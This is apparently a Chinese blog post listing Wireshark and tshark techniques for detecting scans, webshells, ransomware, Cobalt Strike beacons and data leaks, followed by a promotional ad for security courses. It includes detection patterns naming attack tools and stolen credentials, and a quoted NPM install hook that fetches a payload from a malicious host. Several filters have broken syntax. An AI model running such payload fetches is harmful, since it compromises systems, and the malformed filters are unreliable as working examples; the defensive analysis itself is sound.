20个Wireshark在网络安全分析中的实战技巧
20个Wireshark在网络安全分析中的实战技巧
一、基础配置篇
-
- 安全捕获环境搭建
# 创建隔离分析环境
sudo ip linkset eth0 promisc on
sudo tcpdump -i eth0 -s 0 -w /mnt/isolated/evidence.pcap
-
- 预置过滤模板
# 高危协议快速过滤
tcp.port in {135,139,445,3389} || udp.port in {53,123,161,500,4500}
-
- 关键字段标记
- • 右键点击IP →
Apply as Column - • 将TTL异常值设为显眼红色(TTL<64 or TTL>128)
二、攻击检测篇
-
- 扫描行为识别
# SYN扫描检测
tcp.flags.syn==1and tcp.flags.ack==0and tcp.window_size <=1024
-
- 暴力破解捕获
# SSH爆破特征
tcp.port==22and (tcp.flags.reset==1or tcp.analysis.retransmission)
-
- DNS隐蔽隧道
# 检测长域名请求
dns and frame.len > 256 && !contains(dns.qry.name,".google.")
-
- WebShell通信特征
http.content_type=="application/octet-stream"
&& http.request.method=="POST"
&& frame.len >1024
-
- 勒索软件通信
tcp contains "GET /decrypt_instructions"
|| tls.handshake.extensions_server_name=="lockbit"
三、数据泄露监控
-
- 信用卡外泄检测
frame matches "\\b[3456]\\d{3}[ -]?\\d{4}[ -]?\\d{4}[ -]?\\d{4}\\b"
-
- 数据库拖库行为
mysql.query contains "SELECT"
&& frame.len >1500
&& tcp.srcport==3306
-
- 云凭据泄露
http.request.uri contains "?AccessKeyId="
|| tls contains "AKIA"
四、高级威胁狩猎
-
- Cobalt Strike检测
# Beacon心跳包特征
tcp.payload matches "\\x00\\x00\\x00..\\xff\\xff\\xff"
&& tcp.len between 20and50
-
- Metasploit载荷识别
http contains "Meterpreter"
|| tcp contains "core_loadlib"
-
- 域渗透横向移动
smb || kerberos
&& (ip.src==<域控IP>or ip.dst==<域控IP>)
-
- 内存攻击特征
tcp contains "\\x90\\x90\\x90" # NOP sled检测
|| http contains ".dll"
五、加密流量分析
-
- TLS指纹识别
# 检测恶意JA3指纹
tls.handshake.ja3 contains "6734f37431670b3ab4292b8f60f29984"
-
- 证书异常检测
tls.handshake.certificate
&& (x509sat.uTF8String == "Phishing Ltd"
|| x509ce.dNSName == "freevpn.malicious.ru")
六、应急响应实战
-
- 攻击时间轴重建
tshark -r attack.pcap -T fields -e frame.time
-e ip.src -e ip.dst -e tcp.port > timeline.csv
-
- 恶意文件提取
# 从HTTP流量中提取PE文件
tshark -r infection.pcap --export-object http,./malware
-
- 攻击者画像生成
# 提取攻击链关键信息
echo"=== C2服务器 ==="
tshark -r c2.pcap -Y "dns" -T fields -e dns.qry.name
echo"=== 用户代理 ==="
tshark -r c2.pcap -Y "http.user_agent" -T fields -e http.user_agent
七、法律合规要点
- • 取证规范:全程使用
editcap保留原始时间戳 - • 哈希校验:
sha256sum evidence.pcap > chain_of_custody.txt - • 隐私过滤:使用
tcprewrite匿名化用户数据
tcprewrite --infile=raw.pcap --outfile=anon.pcap
--dstipmap=192.168.1.0/24:10.0.0.0/24
八、真实攻击案例分析
案例1:供应链攻击溯源
-
- 捕获异常NPM包更新请求:
HTTP/1.1200 OK
Content-Type: application/json
{"version":"1.2.3","scripts":{"install":"curl http://mal-registry.com/payload.sh"}}
-
- 追踪关联IP:
tshark -r breach.pcap -Y "ip.addr==203.0.113.5" -z conv,ip
案例2:金融木马通信解密
-
- 提取恶意DLL中的RC4密钥
-
- Wireshark配置协议解密:
Protocols -> TLS -> (Pre)-Master-Secret log: /path/to/keys.log
九、高阶技巧拓展
- • 流量基线比对:使用
capinfos建立正常流量指纹
capinfos -Tm -r baseline.pcap > baseline_profile.txt
- • AI辅助分析:集成Suricata告警日志
tshark -r traffic.pcap -Y "frame.comment contains 'ET PHISHING'"
- • 工控协议解析:自定义Modbus/TCP解析器
dissector_add_uint("tcp.port", 502, modbus_handle);
十、重要提醒
-
- 三层验证原则:流量特征+行为模式+外部情报
-
- 避免分析陷阱:
-
- • 勿将CDN IP误判为攻击源
- • 识别合法的云服务通信(如AWS metadata)
-
- 持续更新知识库:
-
- • 每日更新
GeoIP2数据库 - • 订阅威胁情报Feeds
- • 每日更新
某次金融攻防演练中,攻击者使用域前置技术隐藏C2通信。防守方通过Wireshark发现异常:
HTTP/2200 OK :authority: legit-cdn.com x-amz-cf-pop: SIN2-C1 # 新加坡节点但TLS证书却显示:
x509ce.dNSName: c2-malicious.tk正是这0.5秒的协议解析差异,阻止了千万级资金损失
附:分析师必备过滤库
# 内网横向移动检测
smb || ldap || winrm || wmi
# 加密挖矿特征
tcp contains "stratum+tcp"
|| http contains "xmr"
# 钓鱼页面识别
http contains "login"
&& http contains "password"
&& !(http.host contains "corp")
当0day攻击发生时,EDR可能沉默、防火墙可能失效,但流过网卡的数据包永远是最诚实的证人。掌握这20项核心技能,意味着你拥有了穿透网络迷雾的终极武器。
黑客/网络安全学习路线
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
网络安全学习资源分享:
下面给大家分享一份2025最新版的网络安全学习路线资料,帮助新人小白更系统、更快速的学习黑客技术!
一、2025最新网络安全学习路线
一个明确的学习路线可以帮助新人了解从哪里开始,按照什么顺序学习,以及需要掌握哪些知识点。
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
读者福利 | CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 (安全链接,放心点击)
我们把学习路线分成L1到L4四个阶段,一步步带你从入门到进阶,从理论到实战。


L1级别:网络安全的基础入门
L1阶段:我们会去了解计算机网络的基础知识,以及网络安全在行业的应用和分析;学习理解安全基础的核心原理,关键技术,以及PHP编程基础;通过证书考试,可以获得NISP/CISP。可就业安全运维工程师、等保测评工程师。


L2级别:网络安全的技术进阶
L2阶段我们会去学习渗透测试:包括情报收集、弱口令与口令爆破以及各大类型漏洞,还有漏洞挖掘和安全检查项目,可参加CISP-PTE证书考试。


L3级别:网络安全的高阶提升
L3阶段:我们会去学习反序列漏洞、RCE漏洞,也会学习到内网渗透实战、靶场实战和技术提取技术,系统学习Python编程和实战。参加CISP-PTE考试。


L4级别:网络安全的项目实战
L4阶段:我们会更加深入进行实战训练,包括代码审计、应急响应、红蓝对抗以及SRC的挖掘技术。并学习CTF夺旗赛的要点和刷题


整个网络安全学习路线L1主要是对计算机网络安全的理论基础的一个学习掌握;而L3 L4更多的是通过项目实战来掌握核心技术,针对以上网安的学习路线我们也整理了对应的学习视频教程,和配套的学习资料。
二、技术文档和经典PDF书籍
书籍和学习文档资料是学习网络安全过程中必不可少的,我自己整理技术文档,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,(书籍含电子版PDF)


三、网络安全视频教程
对于很多自学或者没有基础的同学来说,书籍这些纯文字类的学习教材会觉得比较晦涩难以理解,因此,我们提供了丰富的网安视频教程,以动态、形象的方式展示技术概念,帮助你更快、更轻松地掌握核心知识。
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。


四、网络安全护网行动/CTF比赛
学以致用 ,当你的理论知识积累到一定程度,就需要通过项目实战,在实际操作中检验和巩固你所学到的知识,同时为你找工作和职业发展打下坚实的基础。


五、网络安全工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。


面试不仅是技术的较量,更需要充分的准备。
在你已经掌握了技术之后,就需要开始准备面试,我们将提供精心整理的网安面试题库,涵盖当前面试中可能遇到的各种技术问题,让你在面试中游刃有余。
如果你是要找网安方面的工作,它们绝对能帮你大忙。
这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。
参考解析:深信服官网、奇安信官网、Freebuf、csdn等
内容特点:条理清晰,含图像化表示更加易懂。
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…




**读者福利 |** CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 (安全链接,放心点击)
更多推荐
所有评论(0)